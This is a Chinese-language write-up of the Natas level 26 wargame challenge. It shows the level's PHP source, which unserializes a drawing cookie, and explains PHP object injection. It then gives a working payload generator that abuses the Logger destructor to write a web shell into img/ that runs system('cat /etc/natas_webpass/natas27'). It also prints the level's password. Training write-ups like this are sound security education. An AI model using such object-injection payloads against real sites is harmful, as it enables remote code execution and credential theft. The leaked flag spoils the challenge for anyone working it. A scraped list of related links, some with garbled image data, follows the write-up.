##源码:

<?php

    // sry, this is ugly as hell.

    // cheers kaliman ;)

    // - morla

    class Logger{

        private $logFile;

        private $initMsg;

        private $exitMsg;

        function __construct($file){

            // initialise variables

            $this->initMsg="#--session started--#\n";

            $this->exitMsg="#--session end--#\n";

            $this->logFile = "/tmp/natas26_" . $file . ".log";

            // write initial message

            $fd=fopen($this->logFile,"a+");

            fwrite($fd,$initMsg);

            fclose($fd);

        }                       

        function log($msg){

            $fd=fopen($this->logFile,"a+");

            fwrite($fd,$msg."\n");

            fclose($fd);

        }                       

        function __destruct(){

            // write exit message

            $fd=fopen($this->logFile,"a+");

            fwrite($fd,$this->exitMsg);

            fclose($fd);

        }

    }

    function showImage($filename){

        if(file_exists($filename))

            echo "<img src=\"$filename\">";

    }

    function drawImage($filename){

        $img=imagecreatetruecolor(400,300);

        drawFromUserdata($img);

        imagepng($img,$filename);

        imagedestroy($img);

    }

    function drawFromUserdata($img){

        if( array_key_exists("x1", $_GET) && array_key_exists("y1", $_GET) &&

            array_key_exists("x2", $_GET) && array_key_exists("y2", $_GET)){

            $color=imagecolorallocate($img,0xff,0x12,0x1c);

            imageline($img,$_GET["x1"], $_GET["y1"],

                            $_GET["x2"], $_GET["y2"], $color);

        }

        if (array_key_exists("drawing", $_COOKIE)){

            $drawing=unserialize(base64_decode($_COOKIE["drawing"]));

            if($drawing)

                foreach($drawing as $object)

                    if( array_key_exists("x1", $object) &&

                        array_key_exists("y1", $object) &&

                        array_key_exists("x2", $object) &&

                        array_key_exists("y2", $object)){

                        $color=imagecolorallocate($img,0xff,0x12,0x1c);

                        imageline($img,$object["x1"],$object["y1"],

                                $object["x2"] ,$object["y2"] ,$color);

                    }

        }

    }

    function storeData(){

        $new_object=array();

        if(array_key_exists("x1", $_GET) && array_key_exists("y1", $_GET) &&

            array_key_exists("x2", $_GET) && array_key_exists("y2", $_GET)){

            $new_object["x1"]=$_GET["x1"];

            $new_object["y1"]=$_GET["y1"];

            $new_object["x2"]=$_GET["x2"];

            $new_object["y2"]=$_GET["y2"];

        }

        if (array_key_exists("drawing", $_COOKIE)){

            $drawing=unserialize(base64_decode($_COOKIE["drawing"]));

        }

        else{

            // create new array

            $drawing=array();

        }

        $drawing[]=$new_object;

        setcookie("drawing",base64_encode(serialize($drawing)));

    }

?>

<h1>natas26</h1>

<div id="content">

Draw a line:<br>

<form name="input" method="get">

X1<input type="text" name="x1" size=2>

Y1<input type="text" name="y1" size=2>

X2<input type="text" name="x2" size=2>

Y2<input type="text" name="y2" size=2>

<input type="submit" value="DRAW!">

</form> 

<?php

    session_start();

    if (array_key_exists("drawing", $_COOKIE) ||

        (   array_key_exists("x1", $_GET) && array_key_exists("y1", $_GET) &&

            array_key_exists("x2", $_GET) && array_key_exists("y2", $_GET))){

        $imgfile="img/natas26_" . session_id() .".png";

        drawImage($imgfile);

        showImage($imgfile);

        storeData();

    }

?>

主要知识点参见PHP Object Injection(PHP对象注入)

思路上的问题:

了解PHP对象注入后,不知道该如何回显,以为这里没有eval和system等能够执行命令的语句(序列化又只能传入键值对(字符串而非执行语句))。其实很简单,这里不需要服务器端在解析的时候回显flag,我们只需要在能够访问的文件夹(imag\)下建立一个shell(fuck.php)(路径可以用字符串表示传入),写入php语句,然后访问该脚本,就能够进行任意语句执行/回显!

生成序列化的注入实体时犯的错误:

<?php

    class Logger{

        function __construct($file){

            $this->initMsg="<? \n\nsystem('cat /etc/natas_webpass/natas27'); ?>\n\n";

            $this->logFile = "img/fuck3.php";

	    $this->exitMsg ="<? \n\nsystem('cat /etc/natas_webpass/natas27'); ?>\n\n";

        }

    }

print urlencode(base64_encode(serialize(new Logger('asd'))));

?>

源码中声明Logger时进行了访问控制(三个属性全部私有),如果不加private的话是默认公有的,生成的序列化字节串会不匹配,要注意这一点,数据类型一定要匹配。(另外,序列话字节串只能保存键值对,无法保存对象中的方法定义)。

正确做法:

<?php

    class Logger{

	private $logFile;

        private $initMsg;

        private $exitMsg;

        function __construct($file){

            $this->initMsg="<? \n\nsystem('cat /etc/natas_webpass/natas27'); ?>\n\n";

            $this->logFile = "img/fuck3.php";

	    $this->exitMsg ="<? \n\nsystem('cat /etc/natas_webpass/natas27'); ?>\n\n";

        }

    }

print urlencode(base64_encode(serialize(new Logger('asd'))));

?>

ps:其实还有个小问题,当前路径就写“img/....”即可,当时脑袋抽写成了"/imag/...."

然后访问img/fuck.php这个shell即可得到flag。

flag:**55TBjpPZUUJgVP5b3BnbG6ON9uDPVzCJ **

Natas Wargame Level26 Writeup(PHP对象注入)的更多相关文章

  1. Natas Wargame Level20 Writeup(会话状态注入/篡改)

    aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAArMAAACmCAYAAADJYwcaAAAABHNCSVQICAgIfAhkiAAAIABJREFUeF

  2. Natas Wargame Level27 Writeup(SQL表的注入/溢出与截取)

    前端: <html> <head> <!-- This stuff in the header has nothing to do with the level --&g ...

  3. Natas Wargame Level25 Writeup(头部注入+POST/GET注入)

    aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAArsAAAC8CAYAAAB4+WYTAAAABHNCSVQICAgIfAhkiAAAIABJREFUeF

  4. 转:Natas Wargame Level28 Writeup(EBC加密破解)

    From:http://alkalinesecurity.com/blog/ctf-writeups/natas-28-getting-it-wrong/ Now that I knew it was ...

  5. joomla \libraries\joomla\session\session.php 反序列化截断畸形字符串导致对象注入漏洞

    catalog . 漏洞描述 . PHP SESSION持久化 . PHP 序列化/反序列化内核实现 . 漏洞代码分析 . POC构造技巧 . 防御方案 . Code Pathc方案 1. 漏洞描述 ...

  6. struts2将servlet对象注入到Action中

    在struts2框架中,可以通过IoC方式将servlet对象注入到Action中,通常需要Action实现以下接口: a. ServletRequestAware: 实现该接口的Action可以直接 ...

  7. Codeigniter 利用加密Key(密钥)的对象注入漏洞

    http://drops.wooyun.org/papers/1449 原文链接:http://www.mehmetince.net/codeigniter-object-injection-vuln ...

  8. 深入理解PHP对象注入

    0x00 背景 php对象注入是一个非常常见的漏洞,这个类型的漏洞虽然有些难以利用,但仍旧非常危险,为了理解这个漏洞,请读者具备基础的php知识. 0x01 漏洞案例 如果你觉得这是个渣渣洞,那么请看 ...

  9. PHP对象注入 PHP Object Injection

    From:PHP Object Injection Last revision (mm/dd/yy): 01/7/2015 译者:李秋豪 Wednesday, 24. May 2017 05:48PM ...

随机推荐

  1. File I/O

    File I/O Introduction     We'll start our discussion of the UNIX System by describing the functions ...

  2. 完美解决--用VS中的Git做代码管理器,与他人共享代码

    1.创建代码仓库,这里说一下为什么要创建仓库,Git不能够作为源代码管理器,vs中自带的也只能够在本地进行管理,要和他们共享的话必须要有服务器端去存储代码,类似于SVN,它就有客户端和服务器端,这里推 ...

  3. Angular i18n的技术分享、踩过的坑

    1.安装 npm @ngx-translate/core --save npm @ngx-translate/http-loader 2.配置(文本背景部分为该模块新增的)~app.module.ts ...

  4. js 资料

    http://javascript.ruanyifeng.com/#introduction 2.MDN 火狐中文社区  https://developer.mozilla.org/zh-CN/doc ...

  5. (11.28)Java小知识!

    关于继承的继承机制:继承中最常使用的两个关键字是exteds和implements.今天主要和大家分享extends的知识点.这两个关键字的使用决定了一个对象和另一个对象是否是IS-A关系.同时我们还 ...

  6. LINQ学习系列-----1.4 匿名对象

    本篇内容接着上一篇继续讲述,本篇简单讲解匿名对象 一.匿名对象介绍              上代码: var result=new { ID=, Name="张三", Age= ...

  7. jquery获取iframe页面的元素

    $("#iframe_id").contents().find("#iframe_page_id").val(); 其中,iframe_id是页面引用的ifra ...

  8. .NET作品集:linux下的博客程序

    博客程序架构 本博客程序是博主11年的时候参考loachs小泥鳅博客内核开发的.net跨平台博客cms,距今已有6年多了,个人博客网站一直在用,虽然没有wordpress那么强大,但是当时在深究.ne ...

  9. PHP招聘那些事,公司真的不需要培训班出来的人么?

    就业形势严峻的情况下,每个企业对于人才的需求都不一样,并不是说公司不愿意招聘培训班出来的人,而是看你的能力是不是能胜任企业招聘人才的需求,是不是能给企业带来价值的人. 现在市面上的培训机构多如牛毛,然 ...

  10. php代码在服务器中查看接值

    error_log("You messed up!", 3, "/var/tmp/my-errors.log");